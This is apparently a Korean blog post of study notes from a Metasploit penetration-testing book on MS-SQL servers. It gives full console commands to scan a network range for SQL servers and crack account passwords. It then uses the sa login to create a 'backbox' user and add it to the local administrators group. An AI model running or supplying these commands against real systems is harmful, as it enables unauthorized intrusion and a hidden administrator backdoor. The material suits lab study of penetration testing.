728x90
정보 사회란.... 데이터베이스 사회다!!
MS-SQL 서버 취약점 점검
mssql_ping.rb 모듈을 이용해 MS-SQL 서버의 존재 여부를 검색해보기
locate mssql_ping #모듈위치알아내기
use auxiliary/scanner/mssql/mssql_ping
set rhosts 주소.0/24 #대역 전체를 대상으로 스캔을 수행
set threads 256
run
결과 어디 ip주소에서 mssql이 동작중인지 확인 가능
jtr_mssql_fast.rb 모듈을 이용해 서버 계정과 비밀번호 확인하기
use auxiliary/analyze/jtr_mssql_fast
set rhosts 주소
set rport 1433
run
입력 시 출력 결과 중 계정과 비밀번호 정보 알 수 있다.
mssql_exec.rb 모듈을 이용해 윈도우 2000 서버임의의 계정과 비밀번호 설정하기
locate mssql_exec
use auxiliary/admin/mssql/mssql_exec
set rhost 주소
set rport 1433
set username sa
set password 1234
set cmd net user backbox 1234 /add
set threads 256
run
backbox라는 일반 사용자 계정을 생성한 뒤 비밀번호를 1234로 설정하라는 의미(현재 윈도우 2000서버 운영체제에는 해당 계정이 없는 상태)
use auxiliary/admin/mssql/mssql_exec
set rhost 주소
set rport 1433
set username sa
set password 1234
set cmd net localgroup administrators backbox /add
set threads 256
run
backbox라는 일반 사용자 계정을 administrators 란느 로컬 그룹에 포함시키라는 의미
-> backbox 계정을 관리자 계정으로 상승 시킬 수 있음
My-SQL 서버 취약점 점검
PostgreSQL 서버 취약점 점검
728x90
'칼리\메타스플로잇 > 칼리리눅스 입문자를 위한 메타스플로잇 중심의 모의침투' 카테고리의 다른 글
9장_유닉스/리눅스 기반의 운영체제 침투 (0) | 2021.01.25 |
---|---|
7장_윈도우 기반의 운영체제 침투 (0) | 2020.12.21 |
6장_MSF 보조 기능을 이용한 무차별 대입 공격 (0) | 2020.12.21 |
5장_MSF 보조 기능을 이용한 정보 수집 (0) | 2020.12.20 |
4장_버퍼 오버플로우 기법과 메타스플로잇 기초 (0) | 2020.08.12 |